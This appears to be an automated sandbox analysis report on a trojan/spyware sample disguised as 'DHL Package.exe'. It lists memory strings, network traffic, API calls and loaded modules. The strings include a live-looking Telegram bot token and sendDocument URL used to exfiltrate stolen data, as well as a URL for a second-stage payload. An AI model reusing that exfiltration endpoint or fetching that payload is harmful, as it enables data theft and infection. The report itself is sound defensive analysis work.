Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: DHL Package.exe, 0000000C.00000002.6260987034.0000000006A27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL Package.exe, 0000000C.00000002.6260987034.00000000069D8000.00000004.00000020.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6261513905.0000000006CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://monteveliz.cl/SjZVauFBbad87.bin
Source: DHL Package.exe, 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Package.exe, 00000000.00000000.1150512237.000000000040A000.00000008.00000001.01000000.00000003.sdmp, DHL Package.exe, 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873
Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6272525391.0000000037F2E000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6272525391.0000000037F2E000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/lB
Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6272525391.0000000037F2E000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.252.169
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.252.169$
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49750 version: TLS 1.2

Source: C:\Users\user\Desktop\DHL Package.exe

Code function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405582

Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040348F
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		12_2_0040348F

Source: C:\Users\user\Desktop\DHL Package.exe

File created: C:\Windows\SysWOW64\aminah.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_00406AFA	0_2_00406AFA
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_6CA71B5F	0_2_6CA71B5F
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00406AFA	12_2_00406AFA
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015B138	12_2_0015B138
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015C160	12_2_0015C160
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00156320	12_2_00156320
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015C441	12_2_0015C441
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015B5E0	12_2_0015B5E0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_001548B7	12_2_001548B7
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015B8C1	12_2_0015B8C1
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00156948	12_2_00156948
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015BBA1	12_2_0015BBA1
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015EE21	12_2_0015EE21
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015BE81	12_2_0015BE81
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015B300	12_2_0015B300
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015E32F	12_2_0015E32F
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015E340	12_2_0015E340
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00153378	12_2_00153378
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_001537E5	12_2_001537E5
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0015FB39	12_2_0015FB39
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39387930	12_2_39387930
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39380D60	12_2_39380D60
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39383410	12_2_39383410
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938B0B8	12_2_3938B0B8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938E139	12_2_3938E139
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39380900	12_2_39380900
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39380D51	12_2_39380D51
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938E148	12_2_3938E148
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938E5A0	12_2_3938E5A0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938E591	12_2_3938E591
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938E9F8	12_2_3938E9F8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938E9E8	12_2_3938E9E8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39388000	12_2_39388000
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39383400	12_2_39383400
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39380040	12_2_39380040
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938B0A8	12_2_3938B0A8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393804A0	12_2_393804A0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39380491	12_2_39380491
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938DCF0	12_2_3938DCF0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393808F1	12_2_393808F1
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938DCE2	12_2_3938DCE2
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938D310	12_2_3938D310
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938F700	12_2_3938F700
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938D301	12_2_3938D301
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938FB58	12_2_3938FB58
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938FB49	12_2_3938FB49
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39386F88	12_2_39386F88
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938EE50	12_2_3938EE50
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938EE40	12_2_3938EE40
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938F2A8	12_2_3938F2A8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938F29A	12_2_3938F29A
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_3938F6F0	12_2_3938F6F0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AE530	12_2_393AE530
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AB910	12_2_393AB910
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AAD08	12_2_393AAD08
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AEB78	12_2_393AEB78
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393ABF60	12_2_393ABF60
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AD240	12_2_393AD240
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A38B8	12_2_393A38B8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AC5A8	12_2_393AC5A8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AD890	12_2_393AD890
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393ACBF0	12_2_393ACBF0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393ADEE0	12_2_393ADEE0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A0D38	12_2_393A0D38
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A6B30	12_2_393A6B30
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A5E30	12_2_393A5E30
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AD234	12_2_393AD234
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A8A20	12_2_393A8A20
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AE520	12_2_393AE520
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A7D18	12_2_393A7D18
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A8A10	12_2_393A8A10
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A3008	12_2_393A3008
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A7D08	12_2_393A7D08
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A2300	12_2_393A2300
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AA000	12_2_393AA000
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A8E78	12_2_393A8E78
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A8170	12_2_393A8170
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A8E68	12_2_393A8E68
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A3460	12_2_393A3460
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A8161	12_2_393A8161
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A2758	12_2_393A2758
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AA458	12_2_393AA458
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A1A50	12_2_393A1A50
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A9750	12_2_393A9750
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393ABF50	12_2_393ABF50
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A3451	12_2_393A3451
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A0D48	12_2_393A0D48
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A2748	12_2_393A2748
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AA449	12_2_393AA449
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A0040	12_2_393A0040
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A1A40	12_2_393A1A40
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A9740	12_2_393A9740
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A5AB8	12_2_393A5AB8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A85B8	12_2_393A85B8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AA8B0	12_2_393AA8B0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A4FB0	12_2_393A4FB0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A2BB0	12_2_393A2BB0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A1EA8	12_2_393A1EA8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A9BA8	12_2_393A9BA8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A4FA8	12_2_393A4FA8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A11A0	12_2_393A11A0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AA8A0	12_2_393AA8A0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A2BA1	12_2_393A2BA1
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A5AA7	12_2_393A5AA7
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A0498	12_2_393A0498
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A7898	12_2_393A7898
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A9B98	12_2_393A9B98
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AC598	12_2_393AC598
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A1E99	12_2_393A1E99
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A1191	12_2_393A1191
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A0488	12_2_393A0488
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A7889	12_2_393A7889
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AD880	12_2_393AD880
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A15F8	12_2_393A15F8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A2FF8	12_2_393A2FF8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AACF8	12_2_393AACF8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393AB8FF	12_2_393AB8FF
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A08F0	12_2_393A08F0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A22F0	12_2_393A22F0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A9FF0	12_2_393A9FF0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A15E8	12_2_393A15E8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393ACBEC	12_2_393ACBEC
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A08E1	12_2_393A08E1
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A92D0	12_2_393A92D0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393ADED0	12_2_393ADED0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A85C8	12_2_393A85C8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_393A92C0	12_2_393A92C0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_39AC0040	12_2_39AC0040

Source: C:\Users\user\Desktop\DHL Package.exe

Code function: String function: 00402D3E appears 51 times

Source: DHL Package.exe

Static PE information: invalid certificate

Source: DHL Package.exe, 00000000.00000000.1150584758.0000000000459000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametannins elohist.exe> vs DHL Package.exe
Source: DHL Package.exe, 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametannins elohist.exe> vs DHL Package.exe

Source: DHL Package.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/10@4/4

Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040348F
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		12_2_0040348F

Source: C:\Users\user\Desktop\DHL Package.exe

Code function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404822

Source: C:\Users\user\Desktop\DHL Package.exe

Code function: 0_2_004021A2 CoCreateInstance,

0_2_004021A2

Source: C:\Users\user\Desktop\DHL Package.exe

File created: C:\Users\user\AppData\Local\peggle

Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\DHL Package.exe

File created: C:\Users\user\AppData\Local\Temp\nsn91A1.tmp

Jump to behavior

Source: DHL Package.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL Package.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DHL Package.exe

Virustotal: Detection: 15%

Source: C:\Users\user\Desktop\DHL Package.exe

File read: C:\Users\user\Desktop\DHL Package.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"
Source: C:\Users\user\Desktop\DHL Package.exe	Process created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"
Source: C:\Users\user\Desktop\DHL Package.exe	Process created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: fwpuclnt.dll	Jump to behavior
